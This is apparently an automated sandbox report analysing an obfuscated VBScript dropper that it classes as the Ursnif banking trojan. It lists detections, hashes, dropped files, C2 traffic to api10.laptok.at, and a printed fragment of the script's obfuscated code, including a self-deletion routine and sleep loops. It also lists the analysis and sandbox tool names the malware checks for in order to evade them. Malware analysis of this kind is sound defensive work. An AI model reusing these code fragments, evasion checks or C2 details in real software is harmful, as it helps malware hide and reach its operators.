Analysis Report 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs

Overview

General Information

Sample Name: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs
Analysis ID: 329942
MD5: e913defabdbffb6f3e8f5059d44cbf5f
SHA1: 6b7712ee4b899e009e9fca462168041cbedb881a
SHA256: c3d02a137b9fffdcc4b61fba5f6653a35c4cee283ad0f0c878bc4e8a5fee6cf9

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 12%
Source: http://api10.laptok.at/favicon.ico Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\occurrent.xlsx Virustotal: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\occurrent.xlsx Metadefender: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\occurrent.xlsx ReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs Virustotal: Detection: 20%
Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs ReversingLabs: Detection: 22%
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local

Networking:

IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 47.241.19.44
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/tcaxpvd4aE8wKgoJlfYM2r/mfaTHqejrF6Ms/fbc5TC6Y/Ifyg72FAqKAjYDX6bHayr47/eRQRrltwQ5/64lRZGzla3M_2B0WA/kxTVS_2Fr7nt/rK_2BABkAtX/yDDo6_2B3pEN9H/NYwyDmo_2FYcvMVgPGpXD/Exdt_2FIBawltH_2/Fy0azIOxL7Yasif/vnkFJ0vm4N7tHBKMPY/K42llqWvr/aTpOJPo87yeEq9IUL2sh/sTONsr4H4kkXgR8pHPc/bMTnM0tyiyC_2FFNJsEa_0/A_0DFjfJrb9DF/SHbL_2BH/ZaYX_2BNdJdcrZzOwiVlaeh/daUI_2B_2BvtnK/3 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml0.15.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa32ff212,0x01d6d169</date><accdate>0xa32ff212,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.15.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa32ff212,0x01d6d169</date><accdate>0xa32ff212,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.15.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa3325271,0x01d6d169</date><accdate>0xa3325271,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.15.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa3325271,0x01d6d169</date><accdate>0xa3325271,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.15.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa334b4ac,0x01d6d169</date><accdate>0xa334b4ac,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.15.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa334b4ac,0x01d6d169</date><accdate>0xa334b4ac,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 13 Dec 2020 16:03:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {CD3F675A-3D5C-11EB-90EB-ECF4BBEA1588}.dat.15.dr String found in binary or memory: http://api10.laptok.at/api1/tcaxpvd4aE8wKgoJlfYM2r/mfaTHqejrF6Ms/fbc5TC6Y/Ifyg72FAqKAjYDX6bHayr47/eR
Source: msapplication.xml.15.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.15.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.15.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.15.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.15.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.15.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.15.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.15.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\occurrent.xlsx 2804E1927303F37313996430C3F824DB6F0A471793CCAE5D5E29216C60BDA682
Java / VBScript file with very long strings (likely obfuscated code)
Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs Initial sample: Strings found which are bigger than 50
Source: occurrent.xlsx.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winVBS@4/22@1/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CD3F6758-3D5C-11EB-90EB-ECF4BBEA1588}.dat
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs Virustotal: Detection: 20%
Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs ReversingLabs: Detection: 22%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5900 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5900 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs Static file information: File size 2513120 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\Letterplease\CompareBlack\PlanKey\coast.pdb source: wscript.exe, 00000000.00000003.695178890.000002367448D000.00000004.00000001.sdmp, occurrent.xlsx.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.QuitEnd IfIf (must447 = 5000000) ThennrIOBNG = nrIOBNG + (104 - ((1234 - (4335 - 3205.0)) - 100.0))End IfREM sadism shah461 Dortmund altar spheric inapproachable protractor allotted chill617 craftsmen bacchanalian, Linotype Parthia crimp Riemannian actinic Aaron510 Abelson palisade hydrothermal croupier morbid latitude Seidel betide iodine connotation explode headwind negate wise cambric perpetuate Azerbaijan. smallpox Meistersinger contractor. coffee bemuse Lagos monetarism wishful scattergun narcotic lid pinhole brownish pica PTA, 3566063 bobble acerbic, affectionate interferometer polytechnic cosmopolitan ascension, tribe prostaglandin310 necessitate Bootes tremble88 Vida occidental drippy Cuba, orient wand tableaux flagellate. 5841248 rapier irretrievable Notre261 varistor posterior accusative platonic Sanhedrin, Eros form pluck macrophage thy Mansfield PVC Belize Spain monsieur knack Jorgenson leap31 owe too shabby delusive imbalance impassive improbable If (must447 = 200) ThenExit DoEnd ifmust447 = must447 + 1LoopWith WScript.Sleep 5000End With' whorl bluff penitent Cyrillic wastage atheist Grenoble unchristian famish Barrett Tasmania889 Chicano psychosis teat896 tort Brooklyn auspice, Ackerman Prado Daytona insignia myel Norfolk. martini leisure incautious lock calligraphy Sol whiz left907 empire Anna Pasadena contribution dryad posey. declamatory froze mock701, 3443966 assign Burke guardian prehensile JACM shrike mi Kauffman teat470 gnat maser pompey mammal mulct cant Vassar Yaounde staph cachalot929 Eleazar Sikorsky serene swam prurient Stamford Formosa retention chartreuse befallen spalding. vouch decipher ancient. 
click demoniac Cochran girlish desolater strategist, Brandt fricative cacao exhilarate rapprochement Chinook Pitt978 Aquinas End FunctionFunction VTuCrj()' sensual, 1938734 demented cork politicking tropic hay marigold malnourished scarves Simpson ppm cuttlefish707 sum73 megaton fiance Astoria course, 8993080 circumvention869 without sugary paraphernalia Luftwaffe91 carton excessive jumpy leadeth237 millionaire instruct, 1390117 copywriter gel145 wallow. 1785352 glen901 acclaim bestir radiophysics swampland486 Cecil remediable cop restive ashen everybody mercuric Thetis124 sorghum rob doctoral chef wisecrack turnabout Galatea sinistral Mendelian magnanimous courage primitive test Friedman kibitz heavy Virginia lumen botanic flute inputting grandfather. stater Dim confiscatory: Set confiscatory = WScript.CreateObject("Scripting.FileSystemObject")confiscatory.DeleteFile WScript.ScriptFullName, TrueEnd FunctionFunction Doria(transonic, lunge)Dim TPeZLgi, Worcestershire43Set TPeZLgi = CreateObject("Scripting.FileSystemObject")REM bismuth methyl. melon Barney dharma. standoff impious slide pee919, testicle vale fishpond. referent backpedal TWA cotangent centenary heel corrodible343 Saviour, wingtip925 viewpoint114 boolean483 hereinabove. 3232348 checksummed, pass sentential accretion colonist Cartesian. 5287369 ea

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\occurrent.xlsx
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\occurrent.xlsx

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXEA
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.695861434.000002366C2E4000.00000004.00000001.sdmp Binary or memory string: XE","WINALYSIS.EXE","EMUL.EXE","MALMON.EXE","REPUTILS32.EXE","WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXER
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: IDAG.EXEZ:V
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: PEID.EXE/O#Z
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\occurrent.xlsx
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6888 Thread sleep time: -30000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: occurrent.xlsx.0.dr

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

Behavior Graph (graph image not included; the information below is what the graph text carried)

Behavior Graph ID: 329942
Sample: 3a07d9bd-1b72-4b18-a990-8f5...
Startdate: 13/12/2020
